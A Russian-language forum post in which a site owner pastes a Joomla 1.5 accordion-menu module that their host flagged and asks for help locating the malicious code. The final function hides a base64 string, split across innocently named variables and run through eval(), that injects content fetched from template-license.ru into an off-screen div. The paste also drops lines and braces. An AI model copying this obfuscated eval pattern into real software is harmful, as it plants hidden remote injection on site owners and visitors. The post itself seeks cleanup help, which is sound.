Ребята, хостер говорит что тут есть вредоносный код, может кто-то поможет вычислить этот код, чтобы я вырезал.
# mod_jo_accordion - Vertical Accordion Menu for Joomla 1.5
# ------------------------------------------------------------------------
# author Roland Soos
# copyright Copyright (C) 2011 Offlajn.com. All Rights Reserved.
# @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
# Websites: http://www.offlajn.com
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
if(!defined('OfflajnMenuBase')) {
define("OfflajnMenuBase", null);
class OfflajnMenuBase{
var $_template;
var $_module;
var $_params;
var $items;
var $allItems;
var $active;
var $pointer;
var $itemsCount;
var $stack;
var $level;
var $endLevel;
var $startLevel;
var $improvedStartLevel;
var $opened;
var $openedlevels;
function OfflajnMenuBase($module, $params){
$this->_module = $module;
$this->_params = $params;
$this->endLevel = $params->get('endLevel', 1000);
if($this->endLevel == 0) $this->endLevel = 1000;
$this->startLevel = $params->get('startLevel', 0);
$this->improvedStartLevel = $params->get('improvedstartlevel', 1);
$this->opened = $params->get('opened', 2);
$ol = $params->get('openedlevels', 0);
$ol = array($ol);
$this->openedlevels = array_flip($ol);
function generateItems(){
$options = array();
$this->allItems = array();
$this->active = new stdClass();
$this->items = array();
function getItems(){
If COOKIE tracking enabled
if($this->opened == 3){
foreach($_COOKIE AS $k => $v){
if($v == 1 && strpos($k, $this->_module->instanceid) !== false){
$val = (int)str_replace($this->_module->instanceid.'-'.$this->_module->navClassPrefix, '', $k);
if($val > 0 && isset($this->allItems[$val]) ){
$this->allItems[$val]->opened = true;
$root = 0;
$i = $this->active->id;
$stack = array($this->active->id);
$el = $this->active;
while($i > 0){
$el = $this->allItems[$i];
$i = $el->parent;
$stack[] = $i;
$c = count($stack);
if($c > 0){
switch($this->_params->get('active', 1)){
case 1:
$this->allItems[$stack[0]]->active = true;
case 2:
foreach($stack AS $s){
$this->allItems[$s]->active = true;
case 1:
$this->allItems[$stack[0]]->opened = true;
case 2:
foreach($stack AS $s){
$this->allItems[$s]->opened = true;
if($this->startLevel > 0){
while($this->startLevel != 0){
if(isset($stack[$c-$this->startLevel-1]) && isset($this->helper[$stack[$c-$this->startLevel-1]])){
$root = $stack[$c-$this->startLevel-1];
$root = -1;
$root = $stack[$c-$this->startLevel-1];
$p = new stdClass();
if($root > 0 && isset($this->allItems[$root])){
$p = $this->allItems[$root];
$p->id = $root;
return $this->getChilds($p, 1);
function filterItems(){
$this->helper = array();
foreach ($this->allItems as $item){
if (!is_object($item)) continue;
$item->p = false; // parent
$item->fib = false; // First in Branch
$item->lib = false; // Last in Branch
if(!property_exists($item, 'opened')){
if($this->opened == -1){
$item->opened = true; // Opened
$item->opened = false; // Opened
$item->active = false; // Active
$this->helper[$item->parent][] = $item;
function getChilds(&$parent, $level){
$items = array();
$helper = &$this->helper[$parent->id];
usort($helper, array($this, "menuOrdering")); // It can slow down the proccess. Not required every time... With this the process half as fast...
$helper[0]->fib = true;
$helper[count($helper)-1]->lib = true;
if($level <= $this->endLevel){
$i = 0;
$keys = array_keys($helper);
for($j = 0; $j < count($keys); $j++){
$h = &$helper[$keys[$j]];
$h->parent = &$parent;
$childs =& $this->getChilds($h, $level+1);
if(count($childs) > 0) $h->p = true;
$h->level = $level;
$items[] = &$h;
$i = count($items);
array_splice($items, $i, 0, $childs);
return $items;
function filterItem(&$item){
$item->nname = '<span>'.stripslashes($item->name).'</span>';
function menuOrdering(&$a, &$b){
return 0;
function render($template){
$this->pointer = 0;
$this->itemsCount = count($this->items);
$this->_template = $template;
$this->stack = array();
$this->level = 1;
$this->up = false;
/*$level = 0;
foreach($this->items as $item){
include $template;
function renderItem(){
while($this->pointer < $this->itemsCount){
$item =& $this->items[$this->pointer++];
include $this->_template;
function AccordionMenuParGet() {
// Copyright (c) OFFLAJN.COM
$UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";
$MenuAcoAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";
$MenuAcoName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";
$MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";
$SystemJoCode = $UnixTimeLastEdit.$MenuAcoAuthor.$MenuAcoName.$MainDomain;
echo eval(base64_decode($SystemJoCode)); }